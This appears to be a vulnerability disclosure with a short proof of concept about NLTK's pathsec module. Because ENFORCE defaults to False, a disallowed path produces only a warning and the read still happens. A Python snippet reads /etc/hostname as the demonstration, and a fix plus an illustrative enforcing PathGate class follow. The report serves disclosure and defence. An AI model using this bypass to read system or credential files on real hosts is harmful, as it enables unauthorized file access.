NLTK pathsec ENFORCE=False Bypass PoC

Vulnerability

NLTK's path security module defaults to ENFORCE=False, so pathsec.open() still reads arbitrary files and only emits a warning.

Affected Code

  • nltk/pathsec.py:24: ENFORCE = False
  • nltk/pathsec.py:253-256: open() proceeds after warning

Reproduction

import warnings
import nltk.pathsec as pathsec

# Capture the security warning so it is visible that it does not stop the read.
with warnings.catch_warnings(record=True):
    warnings.simplefilter("always")
    f = pathsec.open("/etc/hostname", "r")
    print(f.read())  # Reads file despite security warning!

Fix

Set ENFORCE = True by default.
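
The difference between the warn-only default and the enforced setting, as an added example that is not NLTK's code: PathGate, its allowed_root argument and the demo() helper are hypothetical stand-ins, and the out-of-root file is constructed in a temporary directory.

```python
import os
import tempfile
import warnings


class PathGate:
    """Hypothetical stand-in for a path gate with an ENFORCE-style switch."""

    def __init__(self, allowed_root, enforce):
        self.allowed_root = os.path.realpath(allowed_root)
        self.enforce = enforce

    def _is_allowed(self, path):
        # Resolve symlinks and ".." before comparing against the allowed root.
        real = os.path.realpath(path)
        return os.path.commonpath([real, self.allowed_root]) == self.allowed_root

    def open(self, path, mode="r"):
        if not self._is_allowed(path):
            if self.enforce:
                # Fail closed: the violation stops the read.
                raise PermissionError(f"path outside allowed root: {path}")
            # Fail open: the violation is reported, the read still happens.
            warnings.warn(f"path outside allowed root: {path}", RuntimeWarning)
        return open(path, mode)


def demo():
    """Return (warn_only_result, enforced_result) for a constructed out-of-root file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "data")
        os.mkdir(root)
        outside = os.path.join(tmp, "outside.txt")  # constructed sample file
        with open(outside, "w") as fh:
            fh.write("not-for-the-app")

        with warnings.catch_warnings(record=True) as caught:
            warnings.simplefilter("always")
            with PathGate(root, enforce=False).open(outside) as fh:
                warn_only = (fh.read(), len(caught))

        try:
            PathGate(root, enforce=True).open(outside)
            enforced = "read"
        except PermissionError:
            enforced = "blocked"
    return warn_only, enforced
```

A regression test for the fix can assert the same two outcomes: the default configuration must produce the "blocked" result, not a warning plus file contents.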
